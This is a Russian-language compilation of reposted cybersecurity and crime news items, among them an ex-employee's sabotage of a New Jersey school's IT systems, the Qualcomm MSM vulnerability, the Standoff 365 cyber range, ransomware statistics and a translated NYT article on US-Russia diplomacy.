Экс-менеджер по ИТ одной из школ Нью-Джерси отомстил бывшему работодателю за увольнение, выведя из строя ряд ИТ-систем образовательного учреждения – для этого он воспользовался все еще не отозванными на момент разрыва трудового договора полномочиями. Свою вину «диверсант» признал в суде. Ему грозит тюремное заключение сроком до 10 лет и огромный штраф.
Кибератака на школу
Бывший менеджер по информационным технологиям общеобразовательной средней школы округа Эссекс (штат Нью-Джерси, США), организовал мощную кибератаку на ИТ- и телекоммуникационную инфраструктуру своего бывшего работодателя, пишет Bleeping Computer.
По сообщению Министерства юстиции США, действия 30-летнего Конора Лахиффа (Conor LaHiff), были обусловлены стремлением отомстить за необоснованный, по мнению ИТ-специалиста, разрыв трудовых отношений с ним в июне 2023 г.
Прямой действительный ущерб, нанесенный государственной школе в результате атаки Лахиффа, согласно сообщению ведомства, составил как минимум $5 тыс.
Злодеяния бывшего ИТ-менеджера
Согласно материалам дела, Конор Лахифф нанес серьезнейший вред цифровой инфраструктуре образовательного учреждения, в котором трудился до недавнего времени.
Так, ему вменяются удаление 1,2 тыс. учетных записей Apple ID, привязанных к аккаунту Apple School Manager школы, а также попытка изменить принципы организации учетных данных в системе.
По информации, опубликованной на портале поддержки компании, Apple School Manager – служба, позволяющая образовательной организации приобретать содержимое, настраивать автоматическую регистрацию устройств в решении для управления мобильными устройствами (MDM), а также централизованно создавать учетные записи для учащихся и сотрудников. Интернет-портал Apple School Manager предназначен для менеджеров по технологиям, ИТ-администраторов, сотрудников и инструкторов, говорится в посвященном описанию сервиса разделе.
Лахифф также якобы деактировал свыше 1,4 тыс. иных учетных записей Apple, не привязанных к аккаунту в сервисе Apple School Manager, и заблокировал учетные записи администратора в ряде применяемых школой сервисов, в том числе, обеспечивающих защиту от угроз ИБ ее инфраструктуре.
Наконец, злоумышленник отключил системы, обеспечивавшие телефонную связь внутри организации, что привело к ее недоступности для персонала на протяжении 24 часов.
Какое наказание светит Лахиффу
В середине декабря 2023 г. мужчина признал свою вину по одному эпизоду обвинения в нарушении закона США о мошенничестве и злоупотреблении с использованием компьютеров (Computer Fraud And Abuse Act; CFAA).
Теперь ему грозит до 10 лет лишения свободы и штраф до $250 тыс. – приговор будет вынесен 20 марта 2024 г. Однако маловероятно, что суд отправит Лахиффа в тюрьму на максимально возможный предусмотренный законодательством США срок. Скорее, всего наказание будет установлено по нижней границе, как это бывало и не раз при вынесении приговоров по более серьезным правонарушениям, либо вообще не будет связано с реальным лишением свободы.
Примечательно, что, нанеся серьезный удар по цифровой инфраструктуре средней школы округа Эссекс в Нью-Джерси, Лахифф оперативно подал заявление о приеме на работу в другое образовательное учреждение региона на аналогичную позицию, видимо, всерьез намереваясь избежать ответственности за свои злодеяния. Этот факт биографии подсудимого не ускользнул от внимания суда в Бостоне, где проходит текущий процесс. Согласно постановлению суда, Лахиффу придется уведомить своего потенциального работодателя о наличии судимости и факте признания вины в нарушении CFAA.
История, которая повторяется из раза в раз
Дело Лахиффа – очередной яркий пример того, как одержимый местью бывший ИТ- специалист с широкими полномочиями внутри организации даже после увольнения сохраняет реальную возможность нанести весомый ущерб ее критически важным система.
Элементарная координация действий представителей кадровой службы организации и ее ИТ-подразделения могла бы уберечь школу от серьезных финансовых потерь, персонал – от лишней головной боли, а строптивого экс-сотрудника – от уголовного преследования, во всяком случае на какое-то время. Достаточно лишь было своевременно отозвать права доступа бывшего сотрудника к компьютерным системам организации.
В середине декабря 2023 г. CNews писал о деле Миклоса Дэниела Броуди (Miklos Daniel Brody) из Сан-Франциско, в прошлом – инженера по облачным сервисам в First Republic Bank, в настоящем – обитателя одного из исправительных учреждений США.
Броуди разгромил инфраструктуру разработки ПО банка, воспользовавшись рабочим MacBook, который не был вовремя лишен привилегированного доступа к корпоративной сети. Как и в случае с Лахиффом, поводом для атаки на своего бывшего работодателя стала месть за увольнение – мужчина в нарушение протоколов безопасности подключал к своему рабочему ноутбуку различные флеш- накопители, содержащие информацию сомнительного происхождения, в том числе и порнографического характера.
В марте 2021 г. CNews сообщил о том, что бывший сотрудник ИТ-консалтинговой компании Дипаншу Кхер (Deepanshu Kher) решил отомстить за свое увольнение удалением 1,2 тыс. аккаунтов сотрудников из 1,5 тыс. в одной из компаний- клиентов, расположенной в Карлсбаде (Калифорния, США) в сервисе Microsoft 365. Диверсия Кхера остановила работу компании более чем на два дня.
В апреле 2017 г. в США завели уголовное дело против Нимеша Пателя (Nimesh Patel), который в течение 14 лет работал системным администратором в компании Allegro MicroSystems. Ему пришлось уйти из компании, и он решил отомстить бывшему работодателю путем заражения вирусом базы данных его бухгалтерии на СУБД Oracle.
Европол создал оперативную группу для сбора и анализа развединформации из открытых источников (OSINT), чтобы поддержать Украину.
Группу возглавят подразделения из полиции Нидерландов и Федерального ведомства уголовной полиции Германии при поддержке Европола и его аналитического проекта.
OTF может привлекать поддержку из стран, не входящих в OTF, агентств ЕС, НПО или частных компаний.
В группу вошли: Бельгия, Великобритания, Германия, Ирландия, Испания, Италия, Литва, Нидерланды, Португалия, Словацкая Республика, Словения, Норвегия, США и Франция.
source: europol.europa.eu/media-press/newsroom/news/europol-sets-osint- taskforce-to-support-investigations-war-crimes-committed-in-ukraine
Два жителя Витебска взламывали аккаунты популярных онлайн-игр и зарабатывали на этом деньги. Об этом сообщили в УВД Витебского облисполкома.
Для своих манипуляций молодые люди использовали вредоносное программное обеспечение. Они подбирали пароли от личных кабинетов пользователей нескольких интернет-сервисов. По данным правоохранителей, такой деятельностью 21-летние витебчане занимались с 2020 года.
Один из подозреваемых на игровых площадках взламывал аккаунты, а затем продавал их третьим лицам. Благодаря любителям онлайн-игр он заработал около 200 тыс. российских рублей. Другой молодой человек использовал аналогичную схему взлома, только заработать успел в разы меньше.
Сотрудники группы по противодействию киберпреступности Октябрьского РОВД Витебска установили подозреваемых. В отношении двух жителей областного центра следователи возбудили уголовные дела по ч.1 ст.354 и ч.1 ст.349 УК Республики Беларусь.
Дуров обвинил WhatsApp в отсутствии защиты переписок пользователей
Дуров не исключил, что техническая команда мессенджера WhatsApp намеренно допускает проблемы в безопасности с момента своего создания.
Cоздатель «ВК» и «Telegram» Павел Дуров раскритиковал разработчиков WhatsApp за отсутствие должной защиты информации пользователей WhatsApp.
Дуров прокомментировал информацию Forbes о том, что американский стартап Boldend разработал способ взломать WhatsApp. В публикации утверждалось , что хакеры в течение нескольких лет могли получать доступ к перепискам пользователей WhatsApp. Дуров отметил, что каждые несколько месяцев исследователи обнаруживают в приложении новую проблему безопасности. По его словам, с момента создания WhatsApp не было практически ни единого момента, когда он был безопасным. Он не исключил, что команда мессенджера допускает проблемы в безопасности целенаправленно.
«Каждые несколько месяцев исследователи обнаруживают в приложении новую проблему безопасности… Трудно поверить, что техническая команда WhatsApp настолько некомпетентна», — написал Дуров в своем Телеграм-канале.
Бета-тестирование первой в России онлайн-платформы The Standoff 365 для проведения киберучений в режиме 24 часа в сутки и 365 дней в году завершилось 24 декабря. Платформа была представлена компанией Positive Technologies месяц назад . Этичные хакеры отметили реалистичность разработанной инфраструктуры. В будущем эксперты по безопасности смогут проверять на платформе защиту реальных компаний.
По оценкам Positive Technologies, озвученным компанией в 2020 году, емкость российского рынка киберполигонов составляет 0,5–1 млрд руб. в год. В России этот рынок только зарождается, в то время как в мире уже есть популярные платформы, где компании могут проверить защищенность своих систем.
The Standoff 365 станет круглогодичной версией киберполигона The Standoff , который проводится с 2016 года в формате трехдневных мероприятий и успел попасть в Книгу рекордов России. В первые годы The Standoff был частью ежегодного международного форума по практической безопасности Positive Hack Days . С 2020 года эта кибербитва проводится отдельно — оказалось, что трех дней для таких масштабных сражений недостаточно: в связи с высокой сложностью инфраструктуры и векторов атак требовалось минимум пять дней.
В отличие от The Standoff, новая онлайн-платформа The Standoff 365 позволяет специалистам по информационной безопасности проводить кибертренировки нон- стоп, не ограничиваясь временными рамками мероприятия. Для полного погружения киберучения должны проводиться продолжительное время — при реальных таргетированных атаках хакеры в многих случаях месяцами находятся в инфраструктуре жертвы, постепенно продвигаясь к цели. Например, среднее время присутствия группировки APT38 оценивалось в 155 дней.
За прошедший месяц тестирование онлайн-платформы осуществляли 46 этичных хакеров, часть которых были финалистами прошлых The Standoff. Цель на данном этапе — получить обратную связь, исправить обнаруженные ошибки. Все это поможет к старту официального релиза создать удобное пространство для комьюнити.
На платформе были смоделированы инфраструктуры двух объектов. Первый из них — электрогенерирующее предприятие Big Bro Group, которое обеспечивает энергией центральный район мегаполиса. На подстанции используются технологичные и высоконадежные силовые трансформаторы, внедрены цифровые системы релейной защиты и АСУ ТП. Обмен информацией между устройствами выполняется по протоколам стандарта МЭК 61850. Второй объект — IT-компания Hello World Systems, которая поддерживает ПО, в том числе решения и сервисы для государственных ведомств. В сети Hello World Systems развернуты типовые для инфраструктуры компаний веб-приложения, почтовый сервер, ERP- и CRM-системы, корпоративная сеть.
Первое место в бета-тестировании занял участник под ником hummelchen. Он реализовал девять недопустимых событий, заработав 17 000 очков за события и 1880 — за уязвимости. Hummelchen первым сумел отключить потребителей города- государства от электросети путем взлома электросчетчиков. Участник также подменил показания электросчетчиков, взломав веб-интерфейс и изменив коэффициенты трансформации, внедрил вредоносный код в процесс разработки ПО, украл персональные данные сотрудников и осуществил другие успешные атаки.
Серебро завоевал BadBlackHat — 10 000 очков за пять реализованных недопустимых событий и 480 очков за уязвимости. На третьем месте — clevergod, который получил 1030 очков за найденные уязвимости и реализовал три события, заработав за них 4500 очков.
«Считаю, что бета-тестирование прошло успешно. Атакующие отмечают, что новый формат участия позволяет лучше изучить инфраструктуру, разобраться с атаками на актуальные сервисы, попробовать новые инструменты, не опасаясь нарушить работу систем реальной компании. Мы, в свою очередь, протестировали подготовленные полигоны и к следующему релизу учтем нюансы, связанные с автоматизацией, векторами атак, наполнением систем и подсказками, чтобы добавить элемент обучения. Отдельно хочу поблагодарить всех атакующих, кто лояльно отнесся к первому запуску платформы в режиме 365/24/7 и внес полезные замечания по поводу инфраструктуры, а также поздравить финалистов — hummelchen, BadBlackHat и clevergod», — прокомментировал завершение бета- тестирования руководитель отдела анализа защищенности веб-приложений Positive Technologies и один из организаторов The Standoff Ярослав Бабин.
За прошедший месяц участники реализовали 9 из 14 уникальных недопустимых событий на двух полигонах и сдали 23 отчета о нахождении таких событий, из которых только 3 были не полными. Атакующие обнаружили 88 уязвимостей, заложенные организаторами: 32 у IT-специалистов в Hello World Systems и 56 — у энергетиков в Big Bro Group. В целом организаторы получили 128 отчетов.
«Мне очень понравилась идея столь масштабной сети с сотней машин, где можно исследовать веб, домены Active Directory, „пощупать“ различные внутренние сервисы и даже взаимодействовать с реальной SCADA, — отметил победитель бета- тестирования Ярослав Шмелев aka hummelchen. — Хочу выделить качественную имитацию действий пользователей, открывающую различные векторы и сценарии атак, — ничего подобного ранее я не видел на других платформах. Удобно, что нет жестких ограничений по таймингу, как на самом The Standoff, есть время разобраться в топологии сети и понять, как она устроена. Мне встречались отдельные баги с недостаточно протестированными векторами, из-за которых не получалось продвигаться дальше, но техподдержка достаточно быстро их исправляла».
В дальнейших планах организаторов The Standoff 365 — добавить новые объекты из различных отраслей экономики, доработать инфраструктуру с учетом полученного в ходе бета-тестирования опыта, визуализировать атаки, запустить систему репортов для команд защитников, позволяющую командам SOC или blue team обучаться на реальных атаках хакеров.
К маю 2022 года доступ к платформе будет открыт пользователям со всего мира. Тогда же в рамках платформы планируется запуск программы bug bounty с крупными денежными призами — как за найденные уязвимости, так и за реализацию ущерба, который компании считают для себя неприемлемым. Подобный формат обещает привлечь к проекту лучших этичных хакеров планеты.
Более трети всех смартфонов в мире оказались подвержены новой уязвимости в Mobile Station Modem (MSM) производства Qualcomm. Этот баг дает злоумышленникам доступ к истории вызовов, SMS-сообщениям и даже позволяет подслушивать разговоры.
MSM представляет собой SoC, который позволяет устройствам подключаться к мобильным сетям. Он был разработан еще в 90-х годах, и с тех пор постоянно совершенствовался, к примеру, добавлялась поддержка 2G, 3G, 4G и 5G. В итоге на сегодняшний день MSM стала одной из самых распространенных технологий в мире, особенно среди производителей смартфонов. В частности, чипы Qualcomm MSM используются в смартфонах Google, Samsung, LG, Xiaomi, One Plus и многих других производителей.
Эксперты компании Check Point сообщают, что обнаружили уязвимость в Qualcomm MSM Interface (QMI), протоколе, который позволяет SoC обмениваться данными с операционной системой смартфона. Эта проблема получила идентификатор CVE-2020-11292.
По данным специалистов, специально модифицированные пакеты Type-Length-Value (TLV), полученные MSM через интерфейс QMI, могут спровоцировать ошибку повреждение информации в памяти (переполнение буфера), что в итоге позволит злоумышленникам выполнить собственный код на устройстве.
«Злоумышленники могли использовать эту уязвимость для внедрения вредоносного кода в модем из Android, в итоге получая доступ к истории вызовов и SMS- сообщениям на устройстве, а также возможность прослушивать разговоры пользователя. Также хакеры могли использовать уязвимость для разблокировки SIM-карты устройства, тем самым преодолевая ограничения, налагаемые поставщиком услуг», — рассказывают в Check Point.
Click to expand...
Отчет специалистов гласит, что эксплуатация уязвимости невозможна, если скрыть искаженные пакет TLV внутри сторонних приложений, работающих в ОС (особенно на Android), если компонент MSM защищен SELinux. Однако отмечается, что пакет TLV может быть передан посредством сотовой связи или мультимедийного контента, отправленного на устройство. При распаковке такой пакет может достичь уязвимого интерфейса QMI.
Хотя в настоящее время около 40% всех смартфонов в мире используют чипы Qualcomm MSM, только около 30% из них уязвимы для описанных экспертами атак.
Представители Check Point сообщили СМИ, что уведомили инженеров Qualcomm о проблеме еще в прошлом году, и декабре 2020 года компания выпустила патч для MSM, который был распространен среди производителей смартфонов. Хотя Qualcomm заявляет, что уведомила всех производителей об ошибке, исследователям неизвестно, какие именно компании уже пропатчили свои продукты, а какие нет.
Источник: xakep.ru/2021/05/07/msm-flaw/
19 сентября правоохранительные органы Венесуэлы в результате штурма тюрьмы Токорон в городе Маракай изъяли несколько десятков ASIC-майнеров и огромный оружейный склад. Об этом сообщает France24.
В масштабной операции приняли участие более 11 000 полицейских и солдат при поддержке танков и бронемашин. Один сотрудник спецназа был убит.
Тюрьма в течение нескольких лет находилась под контролем крупнейшей банды страны — Трен де Арагуа — и являлась ее штаб-квартирой.
Помимо комнаты для добычи криптовалют на территории располагались казино, ночной клуб, рестораны, бейсбольное поле и зоопарк с экзотическими животными. Последние погибли из-за пожара, начавшегося во время штурма.
По сведениям МВД Венесуэлы, 1600 заключенных находились в рабстве у лидеров банды. После захвата контроля над тюрьмой части из них удалось сбежать, оставшиеся были распределены в другие исправительные учреждения.
В числе изъятых предметов власти продемонстрировали ракетные установки, снайперские винтовки, гранатометы, взрывчатку, пулеметные ленты, наркотики и дорогие мотоциклы.
[](https://forklog.com/wp- content/uploads/39f5e973010d00e58e317daff26c535afc58ed7f-1536x1024.webp)
Банда Трен де Арагуа насчитывает около 5000 членов. Ее называют причастной к преступлениям по всей Венесуэле, а также в Колумбии, Бразилии, Перу, Эквадоре, Чили и Боливии.
Напомним, в конце июня малайзийский поставщик электроэнергии Sarawak Energy выявил на острове Борнео майнинговую ферму, владельцы которой занимались нелегальной добычей криптовалют.
Полицией Татарстана выявлены участники группы, которые, находясь на территории республики, а также Нижегородской и Свердловской областей и иных субъектов России, под видом оказания консультационных услуг в области финансовых рынков и проведения торговых операций на форекс-дилере занимались хищением денежных средств граждан.
Оперативники Управления экономической безопасности и противодействия коррупции МВД по Республике Татарстан установили, что подозреваемые связывались с потерпевшими, разместившими в социальных сетях объявления о трудоустройстве, предлагая высокооплачиваемую работу в их компании. Гражданам говорили, что устроят на должность начальника отдела развития, отправляли на обучение.
Затем злоумышленники регистрировали претендентов на подконтрольный им псевдоброкер, где во время проведения имитации торговых операций похищали денежные средства. В случае, если у потерпевших денег было недостаточно, оказывали содействие в получении кредитов, которые в последующем также похищались. В органы внутренних дел Татарстана поступило 15 заявлений от потерпевших. Сумма ущерба составляет более 10 млн рублей.
В результате проведённых оперативно-розыскных мероприятий с февраля по май этого года в Екатеринбурге и Москве были задержаны несколько организаторов, региональный директор и два активных участника данной противоправной деятельности. По местам их проживания изъяты печати, документы и электронные носители информации, имеющие значение для расследования уголовного дела. В отношении подозреваемых избрана мера пресечения в виде заключения под стражу и запрета определённых действий.
Следователем ГСУ МВД по Республике Татарстан возбуждено уголовное дело по ч. 4 ст. 159 Уголовного кодекса Российской Федерации. Оперативно-розыскные и следственные мероприятия по установлению иных лиц, причастных к противоправной деятельности, продолжаются.
Базовый набор требований, разработанный немецкими специалистами, должен обеспечить кибербезопасность спутников.
Федеральное управление информационной безопасности Германии (BSI) выпустило базовый набор требований , которые должны обеспечить кибербезопасность объектов космической инфраструктуры. Опубликованный на прошлой неделе документ является результатом годичной работы подразделения Airbus Defence and Space, Немецкого космического агентства и Немецкого аэрокосмического центра.
Инструкция классифицирует атаки и защитные меры по трем уровням:
Несмотря на впечатляющую детализацию, документ представляет собой скорее базовую информацию о том, что требует внимания, а не прямой набор инструкций. В документе перечисляются мероприятия на основных этапах жизненного цикла спутника: проектирование, испытания, транспортировка, ввод в эксплуатацию и её прекращение. Из интересного также стоит отметить, что ответственность за кибербезопасность космического аппарата с его владельца не снимается даже после отключения аппарата, ведь спутник может содержать секретные данные, поэтому за ним нужно будет постоянно наблюдать.
"Даже если все требования будут выполнены, – предупреждает документ, – стопроцентной безопасности достичь невозможно".
"Число кибератак растет. Выявленные уязвимости используются хакерами все
быстрее и быстрее. Не всегда удается своевременно устранить проблему с помощью
соответствующих обновлений".
Напомним, ранее Космические силы США тоже были обеспокоены безопасностью
спутниковых систем связи. По словам американских специалистов, мишенями для
кибератак становятся наземные сети.
source: bsi.bund.de/SharedDocs/Downloads/DE/BSI/Grundschutz/Hilfsmittel/Profile/Profil_Weltrauminfrastrukturen.html
" Лаборатория Касперского" рассказала об атаках "шифровальщиков" в 2021 году
российских компаний
Хакеры-шифровальщики в 2021 году атаковали 16 тысяч российских компаний,
нападения при этом становятся менее массовыми и более направленными, сообщила
"Лаборатория Касперского".
Шифровальщик - хакерская программа, которая шифрует данные на компьютере или
сервере пользователя. За расшифровку данных хакер требует выкуп от их
владельца.
"По данным "Лаборатории Касперского", в 2021 году в России с применением программ-шифровальщиков были атакованы почти 16 тысяч компаний", - говорится в сообщении.
В компании уточнили, что лишь за 2021 год было обнаружено 49 новых семейств шифровальщиков и более 14 тысяч их модификаций по всему миру. Перед шифрованием хакеры крадут данные у компаний и угрожают выложить их в публичный доступ, если им не заплатят.
"Сегодня подготовка и проведение атак с использованием шифровальщиков осуществляется в рамках целых экосистем с четким разделением труда. Массовые атаки постепенно уступают место таргетированным как потенциально более выгодным для злоумышленников", - приводится в сообщении комментарий эксперта по кибербезопасности "Лаборатории Касперского" Федора Синицына.
"При этом целью таких атак может стать любая организация, независимо от сферы и размера, ведь с большими объемами конфиденциальной информации работают уже не только корпорации", - предупредил эксперт.
Готовность Mozilla принимать пожертвования в криптовалюте вызвала бурные споры по поводу влияния криптомайнинга на климат.
Компания Mozilla не будет принимать пожертвования в криптовалюте из-за сильной негативной реакции пользователей.
Mozilla, которая также управляет некоммерческой организацией, недавно опубликовала в Twitter напоминание о том, что пользователи могут пожертвовать лишнюю или ненужную криптовалюту, чтобы помочь ей с текущими расходами. Это вызвало бурные споры по поводу влияния криптомайнинга на окружающую среду и общество, и компании пришлось пообещать «принять меры», особенно в отношении ее стремлений в области защиты климата.
«На прошлой неделе мы опубликовали в Twitter напоминание о том, что Mozilla принимает пожертвования в криптовалюте. Это привело к важным обсуждениям влияния криптовалюты на окружающую среду. Мы прислушиваемся и принимаем меры»,
Как сообщила Mozilla, децентрализованные web-технологии по-прежнему являются важной областью ее исследований, но многое изменилось с тех пор, как компания начала принимать пожертвования в криптовалюте.
«Поэтому, начиная с сегодняшнего дня, ми начнем проверять, как наша текущая политика в области криптопожертвований соответствует нашим стремлениям по защите климата», - заявили в компании.
Mozilla заявила, что процесс будет полностью прозрачным, пообещала делиться регулярными обновлениям и поблагодарила сообщество за то, что оно привлекло ее внимание к столь важной проблеме.
Подробнее: https://www.securitylab.ru/news/528388.php
Бразильская полиция арестовала южноафриканца Иоганна Стейнберга. Это беглый организатор Mirror Trading International, крупнейшей криптовалютной пирамиды 2020 года.
Иоганн Стейнберг (Johann Steynberg), создатель Mirror Trading International, был объявлен в розыск по линии Интерпола и ФБР в декабре 2020 года. Военная полиция Бразилии GIRO [получила](https://www.pm.go.gov.br/noticias/giro- prende-foragido-internacional-responsavel-por-fraude-milionaria) информацию о южноафриканце, разыскиваемом Интерполом. Ровно через год, в декабре 2021 года, он был выявлен по поддельным документам, арестован и доставлен в отделение федеральной полиции в Гоясе.
Используя схему Понци и обещая ежемесячную доходность до 10%, основатель пирамиды сумел обмануть тысячи вкладчиков. Пострадали клиенты из США, Канады, Намибии и других стран. По предварительным оценкам, через компанию Стейнберга прошло более 29 000 BTC (около $300 млн в ценах 2020 года).
База транзакций пирамиды была [взломана](https://www.moneyweb.co.za/in- depth/investigations/anonymous-data-dump-spills-the-beans-on-mirror-trading- international/) группой Anonymous ZA, которая обратила внимание на подозрительную деятельность MTI. Впоследствии, в октябре 2020 года FSCA провела обыск в офисах MTI и домах акционеров. Генеральный директор исчез в декабре 2020 года, когда выяснилось, что ряд инвесторов MTI не могут вывести деньги.
В заявлении, опубликованном военной полицией Гояса, говорится, что «преступник был представлен суперинтенданту PF для выполнения международного ордера на арест и штрафа за преступление, связанное с использованием поддельных документов.
Между двумя странами состоялся ряд секретных встреч, поскольку администрация Байдена применяет более трезвый подход к отношениям с Кремлем.
МОСКВА. Может показаться, что мало что изменилось для России и США, двух старых противников, стремящихся подорвать друг друга по всему миру.
Российские ракеты, способные нести ядерное оружие, были замечены в движении возле Украины, и Кремль дал понять о возможности новой интервенции там. Он испытал гиперзвуковые крылатые ракеты, которые обходят оборону Америки и разрывают все связи с возглавляемым США альянсом НАТО. После летней паузы атаки программ-вымогателей, исходящие с территории России, возобновились, а в конце октября Microsoft объявила о новой российской кампании кибернетического наблюдения .
С тех пор как президент Байден вступил в должность девять месяцев назад, Соединенные Штаты ввели новые масштабные санкции против России, продолжили вооружать и обучать украинских военных и пригрозили ответными кибератаками против российских целей. Посольство США в Москве практически прекратило выдачу виз.
Когда мировые лидеры встретились на саммите Группы 20 в эти выходные в Риме, г-н Байден даже не получил возможности обсудить дела со своим российским коллегой лицом к лицу, потому что президент Владимир Путин, сославшись на опасения по поводу коронавируса, присутствовал на мероприятии удаленно. .
Однако за поверхностным балансом между двумя глобальными соперниками сейчас есть еще кое-что: разговаривают.
Встреча на высшем уровне между г-ном Байденом и г-ном Путиным в июне в Женеве
положила начало серии контактов между двумя странами, включая три поездки в
Москву высокопоставленных чиновников администрации Байдена с июля и новые
встречи с российскими официальными лицами на нейтральной территории в
Финляндии и Швейцария.
**
Сейчас идет серьезный разговор о контроле над вооружениями, самый глубокий за
последние годы. Главный советник Белого дома по киберпространству и новым
технологиям Энн Нойбергер провела серию тихих виртуальных встреч со своим
кремлевским коллегой. Несколько недель назад - после обширных дебатов в
американском разведывательном сообществе по поводу того, сколько раскрывать -
США раскрыли имена и другие подробности нескольких хакеров, активно
осуществлявших атаки на Америку.**
Теперь, как сказал один чиновник, Соединенные Штаты ждут, чтобы увидеть, приведет ли эта информация к арестам, чтобы проверить, серьезно ли г-н Путин сказал, что будет способствовать борьбе с программами-вымогателями и другими киберпреступлениями.
Официальные лица в обеих странах говорят, что шквал переговоров пока не дал существенного результата, но помогает предотвратить выход российско- американской напряженности из-под контроля.
Высокопоставленный чиновник администрации сказал, что Соединенные Штаты «очень
четко понимают» намерения г-на Путина и Кремля, но считает, что они могут
работать вместе по таким вопросам, как контроль над вооружениями. Чиновник
отметил, что Россия была тесно связана с Соединенными Штатами в восстановлении
ядерной сделки с Ираном и, в меньшей степени, в отношениях с Северной Кореей,
но признал, что есть много других областей, в которых русские «пытаются
бросить ключ в будущее». работает."
ха
Умеренный подход г-на Байдена заслужил одобрение во внешнеполитическом
истеблишменте России, который рассматривает возросшее участие Белого дома как
признак того, что Америка вновь готова к заключению сделок.
«Байден понимает важность трезвого подхода», - сказал Федор Лукьянов, видный московский внешнеполитический аналитик, консультирующий Кремль. «Самое главное, что понимает Байден, - это то, что он не изменит Россию. Россия такая, какая она есть ».
Для Белого дома переговоры - это способ попытаться предотвратить геополитические сюрпризы, которые могут подорвать приоритеты Байдена - конкуренцию с Китаем и внутреннюю повестку дня, сталкивающуюся с множеством проблем. Для г-на Путина переговоры с самой богатой и могущественной державой мира - это способ продемонстрировать глобальное влияние России и укрепить его внутренний имидж как гаранта стабильности.
«То, что русские ненавидят больше всего на свете, следует игнорировать», - сказала Фиона Хилл, которая занимала должность ведущего эксперта по России в Совете национальной безопасности при президенте Дональде Трампе, прежде чем свидетельствовать против него на его первых слушаниях по делу об импичменте. «Потому что они хотят быть важными игроками на сцене, и если мы не будем уделять им столько внимания, они найдут способы привлечь наше внимание».
Для Соединенных Штатов, однако, пропагандистская деятельность чревата риском, подвергая администрацию Байдена критике за то, что она слишком желает сотрудничать с возглавляемой Путиным Россией, которая продолжает подрывать американские интересы и подавлять инакомыслие.
Европейские официальные лица обеспокоены тем, что Россия ведет жесткую игру в условиях энергетического кризиса в регионе, ожидая одобрения нового трубопровода, прежде чем поставлять больше газа. Новые кадры, распространенные в социальных сетях в пятницу, показывают, как ракеты и другое российское вооружение движутся рядом с Украиной, что вызывает слухи о возможности новых действий России против страны.
В США чиновников особенно беспокоит деструктивный характер российской киберкампании. Раскрытие Microsoft новой кампании по проникновению в ее облачные сервисы и проникновению в тысячи американских правительств, корпораций и сетей аналитических центров ясно показало, что Россия игнорирует санкции, введенные Байденом после взлома Solar Winds в январе.
По словам Дмитрия Альперовича, председателя исследовательской группы Silverado Policy Accelerator, это также представляет собой то, что сейчас выглядит как прочное изменение тактики России. Он отметил, что попытка подорвать инфраструктуру киберпространства Америки, а не просто взломать отдельные корпоративные или федеральные объекты, была «смещением тактического направления, а не разовой операцией».
Россия уже нашла способы использовать стремление Байдена к тому, что Белый дом называет более «стабильными и предсказуемыми» отношениями, для получения уступок со стороны Вашингтона.
Когда Виктория Нуланд, высокопоставленный чиновник Госдепартамента, недавно попыталась посетить Москву для переговоров в Кремле, российское правительство не сразу согласилось. Г-жа Нуланд, которую рассматривают в Москве как одну из самых влиятельных "ястребов" Вашингтона в России, была внесена в черный список лиц, которым запрещен въезд в страну.
Но русские предложили сделку. Если Вашингтон утвердит визу высокопоставленному российскому дипломату, который не может въехать в США с 2019 года, то госпожа Нуланд может приехать в Москву. Администрация Байдена приняла это предложение.
Беседы г-жи Нуланд в Москве были охарактеризованы как широкие, но в шквале переговоров между Соединенными Штатами и Россией явно есть области, которые Кремль не хочет обсуждать: подавление Россией инакомыслия и обращение с заключенным в тюрьму лидером оппозиции Алексеем А. Навальный остался в основном без внимания, несмотря на неодобрение, которое г-н Байден выразил по этому поводу в этом году.
Хотя г-н Байден не увидит г-на Путина лично на саммите Группы 20 в Риме или на саммите по климату в Глазго, пресс-секретарь Путина Дмитрий С. Песков заявил в октябре, что еще одна встреча в этом году «в том или ином формате». еще один «между двумя президентами» был «вполне реальным».
Министр иностранных дел Сергей В. Лавров заявил в воскресенье, что он кратко беседовал с г-ном Байденом в Риме и что президент «подчеркнул свою приверженность дальнейшим контактам».
«Байден очень успешно подавал сигналы в сторону России, - сказала Кадри Лийк, специалист по России Европейского совета по международным отношениям в Берлине. «Россия хочет привилегии великой державы нарушать правила. Но для этого вам нужны правила. И нравится вам это или нет, Соединенные Штаты по- прежнему остаются важным игроком среди мировых разработчиков правил ».
Наиболее заметные переговоры между российскими и американскими официальными лицами касались того, что они оба называют «стратегической стабильностью» - фраза, охватывающая традиционный контроль над вооружениями и опасения, что новые технологии, включая использование искусственного интеллекта для управления системами вооружений, могут привести к случайным войны или сократить время принятия решений лидерами, чтобы избежать конфликта. Венди Шерман, заместитель госсекретаря, возглавляла делегацию по этим вопросам, и американские официальные лица называют их «светлым пятном» в отношениях.
Созданы рабочие группы, в том числе группа, которая будет обсуждать «новое оружие», такое как российский «Посейдон», автономная ядерная торпеда.
В то время как официальные лица Пентагона говорят, что ядерная модернизация Китая является их главной долгосрочной угрозой, Россия остается непосредственной проблемой. «Россия по-прежнему является самой непосредственной угрозой просто потому, что у нее развернуто 1550 единиц ядерного оружия», - заявил журналистам в четверг генерал Джон Э. Хайтен, который через несколько недель уйдет в отставку в качестве заместителя председателя Объединенного комитета начальников штабов.
Что касается других контактов, Джон Ф. Керри, посланник Байдена по вопросам климата, в июле провел четыре дня в Москве. А спецпредставитель по Ирану Роберт Мэлли в сентябре провел переговоры в Москве.
Алексей Оверчук, заместитель премьер-министра России, встретился с г-жой Шерман и Джейком Салливаном, советником г-на Байдена по национальной безопасности - переговоры, которые г-н Оверчук назвал «очень хорошими и честными» в комментариях для российских СМИ.
Г-н Путин, прекрасно разбирающийся в тонкостях дипломатических сообщений после более чем 20 лет пребывания у власти, приветствует такие жесты уважения. Аналитики отметили, что он недавно также послал свой собственный сигнал: на вопрос иранского гостя на конференции в октябре, ознаменовал ли уход г-на Байдена из Афганистана упадок американской мощи, г-н Путин ответил, высоко оценив решение г-на Байдена и отвергнув мнение о том, что хаотический отъезд окажет долгосрочное влияние на имидж Америки.
«Пройдет время, и все встанет на свои места без каких-либо кардинальных изменений», - сказал г-н Путин. «Привлекательность страны зависит не от этого, а от ее экономической и военной мощи».

(Published 2021) ](https://www.nytimes.com/2021/10/31/world/europe/biden- putin-russia-united-states.html)
There have been a series of beneath-the-surface meetings between the two countries as the Biden administration applies a more sober approach to relations with the Kremlin.
 www.nytimes.com
Доказательства, полученные путем взлома EncroChat, нарушают шведское законодательство.
